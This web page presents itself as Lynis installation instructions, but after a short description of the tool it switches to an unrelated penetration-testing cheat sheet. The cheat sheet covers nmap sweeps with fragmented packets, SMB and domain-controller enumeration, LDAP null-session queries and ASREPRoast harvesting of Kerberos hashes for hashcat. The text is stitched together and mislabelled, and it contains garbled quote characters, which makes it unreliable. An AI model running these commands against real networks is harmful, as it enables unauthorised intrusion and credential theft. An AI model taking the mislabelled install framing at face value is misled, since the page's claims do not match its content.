Lynis is a battle-tested security tool for systems running Linux, macOS, or Unix-based operating system. It performs an extensive health scan of your systems to support system hardening and compliance testing.
In order to install Lynis on your system, you must follow these steps :
# check what infos you can see
wireshark
# nmap
# BEST - https://miloserdov.org/?p=5248
# discover
sudo nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml $network_ip
# extract the hosts
grep -A 2 'up' nmap_output.xml | grep -E -o '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > hosts.txt
# scan them, find routers
sudo nmap -v -PE -n --min-hostgroup 1024 --min-parallelism 1024 -p 80,443,8080,1080 --open -iL hosts.txt -oX nmap_routers.xml
# OTHERS
# Ping discovery, Top 20, fragment packets, no DNS resolution
nmap -v --top-ports 20 $ip/24 -f -n --open -oA
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
nmap -v --top-ports 200 $ip/24 -f -n -sV --open -oA
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
nmap -v --top-ports 1000 $ip/24 -f -n -sV -Pn --open -oA
# Get domain name
cme smb 10.10.10.10
smbmap -H $dc_ip -u '' -p ''
# Detect SMB on network
responder-RunFinger -i X.X.X.0/24
# Find DC
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'
# Enumerate DC
ldapsearch -h <DC.IP> -x -s base namingcontexts
# Check for null session, if got users go for ASREPRoast with GetNPUsers
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"
# Get hashes with no krb preauth
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10
# Get Users List
GetADUsers.py DC.local/ -dc-ip $dc_ip -debug
# Get Users from ldap
windapsearch -U β full β dc-ip $dc_ip
# Get base domain
ldapsearch -x -h $dc_ip -s base namingcontexts
# Get more info from DC
ldapsearch -x -h $dc_ip -b βDC=DCNAME,DC=LOCALβ
# User Domain info
Get-ADUser $name
# Forest info
Get-ADForest
# Get all computers in the current domain
Get-NetComputer
